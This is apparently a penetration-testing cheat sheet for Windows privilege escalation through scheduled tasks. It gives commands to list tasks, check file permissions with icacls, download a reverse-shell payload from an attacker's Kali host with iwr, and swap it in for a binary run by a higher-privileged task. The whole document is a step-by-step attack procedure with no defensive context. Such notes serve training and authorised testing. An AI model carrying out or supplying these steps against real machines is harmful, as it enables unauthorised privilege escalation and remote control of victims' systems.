Scheduled Tasks

1

Get a list of scheduled tasks

schtasks /query /fo LIST /v

dir C:\Windows\System32\Tasks\

2

Identify a task running by a higher privileged user

3

Check application permission

icacls "<Application Full Path>"

4

Craft a payload that returns reverse shell

5

Download the payload into target machine

iwr -Uri http://<Kali IP Address>/<Payload File Name> -Outfile <Application File Name>

6

Store the original application file in current directory

move <Application File Full Path> ./<Application File Name>.bak

7

Move the payload into the application file location

move <Application File Name> <Application File Full Path>